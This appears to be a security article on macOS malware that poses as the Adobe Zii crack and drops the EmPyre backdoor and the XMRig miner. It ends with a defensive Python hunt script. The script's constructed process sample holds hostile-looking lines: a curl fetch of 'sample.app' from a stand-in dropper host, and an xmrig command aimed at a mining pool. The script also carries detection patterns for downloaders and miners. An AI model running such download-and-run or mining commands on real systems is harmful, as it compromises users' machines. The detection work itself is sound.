XMRig is a legitimate open-source application that uses system CPU resources to mine cryptocurrency. Cyber criminals often misuse such tools to generate revenue at the expense of victims. Here, we look at malware that combines a backdoor tool called EmPyre with XMRig, allowing cyber criminals to exploit infected systems to mine cryptocurrency.

This malware claims to be Adobe Zii, a tool used to 'crack' Adobe software and bypass activation. Once opened, the malware executes a shell script designed to download another script written in the Python programming language. The Python script is named "sample.app" in an attempt to give the impression that it is the genuine Adobe Zii tool. Once executed, "sample.app" performs a number of actions. Firstly, it checks whether the Little Snitch application (a firewall that alerts the user to outbound connections) is installed. If so, the script terminates itself and the infection stops. This check is somewhat redundant: had Little Snitch been present, it would already have alerted the user to the outbound connection made by the first shell script, and if that connection had been denied, "sample.app" would not have been downloaded in the first place. Injection of the EmPyre backdoor follows; this allows execution of various commands remotely.

As mentioned, EmPyre performs many actions on the infected system. Once the backdoor is opened, a command that downloads and runs the XMRig miner is executed. However, this may not be the only problem you face.
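The chain described above leaves a recognisable shape in a process listing: an app bundle whose main executable is a shell script, that shell spawning curl or a Python interpreter, a Python script carrying an ".app" name, and finally a miner process. The following hunt script is an added example written for this page; it is not code from the original article, from Malwarebytes, or from the malware itself. The process table, user paths, host names and pool address in it are constructed, and the three rules are generic heuristics for this pattern rather than indicators extracted from the sample (the only real-world details it relies on are XMRig's own `--donate-level` switch and `stratum+tcp://` pool URL syntax).

```python
"""Hunt a macOS-style process listing for the Adobe Zii / EmPyre / XMRig chain.

Added example, not the article's or the malware's code. Run it as a script
to print findings, or call hunt(text) on the output of:
    ps -axo pid,ppid,args
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed sample in the shape of `ps -axo pid,ppid,args` output.
# Every path, host name and pool address here is made up for this example.
SAMPLE_PS = """\
  PID  PPID ARGS
    1     0 /sbin/launchd
  500     1 /bin/sh /Users/joe/Downloads/Adobe Zii.app/Contents/MacOS/Adobe Zii
  501   500 curl -fsSL -o /tmp/sample.app http://dropper.invalid/sample.app
  502   500 /usr/bin/python /tmp/sample.app
  600     1 /Applications/Safari.app/Contents/MacOS/Safari
  601   502 /tmp/xmrig -o stratum+tcp://pool.invalid:3333 --donate-level 1
  700     1 /bin/bash /Users/joe/bin/backup.sh
  701   700 /usr/local/bin/python3 /Users/joe/bin/backup.py
"""

SHELLS = {"sh", "bash", "zsh"}
FETCHERS = {"curl", "wget"}
# An app bundle whose executable is a shell script shows up as `sh <path>` with
# the script living under this directory inside the bundle.
APP_EXEC_DIR = ".app/Contents/MacOS/"
# XMRig's real command-line vocabulary: stratum pool URLs and --donate-level.
MINER_RE = re.compile(r"stratum\+(tcp|ssl)://|--donate-level|(^|/)xmrig\b", re.I)


@dataclass
class Proc:
    pid: int
    ppid: int
    args: str  # full command line as ps prints it

    @property
    def exe(self) -> str:
        """Basename of the first token, e.g. '/bin/sh' -> 'sh'."""
        return self.args.split()[0].rsplit("/", 1)[-1]

    def is_python(self) -> bool:
        return self.exe.startswith("python")


def parse_ps(text: str) -> Dict[int, Proc]:
    """Parse `ps -axo pid,ppid,args` output (header line skipped) into a pid map."""
    procs: Dict[int, Proc] = {}
    for line in text.strip().splitlines()[1:]:
        pid, ppid, args = line.split(None, 2)  # args may contain spaces
        procs[int(pid)] = Proc(int(pid), int(ppid), args)
    return procs


def hunt(ps_text: str) -> List[Tuple[str, int]]:
    """Return sorted (rule, pid) findings for the three heuristics."""
    procs = parse_ps(ps_text)
    children: Dict[int, List[Proc]] = {}
    for p in procs.values():
        children.setdefault(p.ppid, []).append(p)

    findings: List[Tuple[str, int]] = []
    for p in procs.values():
        # Rule 1: anything that looks like a miner invocation.
        if MINER_RE.search(p.args):
            findings.append(("miner-cmdline", p.pid))
        # Rule 2: a shell launched as an app bundle's executable that spawns a
        # downloader or a Python interpreter (the fake Adobe Zii stage).
        if p.exe in SHELLS and APP_EXEC_DIR in p.args:
            kids = children.get(p.pid, [])
            if any(k.exe in FETCHERS or k.is_python() for k in kids):
                findings.append(("app-shell-spawns-downloader", p.pid))
        # Rule 3: a Python interpreter running a file named like an app bundle
        # (the "sample.app" disguise).
        if p.is_python() and any(t.endswith(".app") for t in p.args.split()[1:]):
            findings.append(("python-script-named-app", p.pid))
    return sorted(findings)


if __name__ == "__main__":
    for rule, pid in hunt(SAMPLE_PS):
        print(f"{rule:30} pid={pid}")
```

Rule 2 is the one worth keeping after this particular campaign is gone: a shell script as an app bundle's main executable is unusual for legitimate software and, combined with a curl or Python child, is a cheap signal for dropper-style fake cracks in general. The benign `backup.sh` / `backup.py` pair in the sample shows that a shell spawning Python is not flagged on its own.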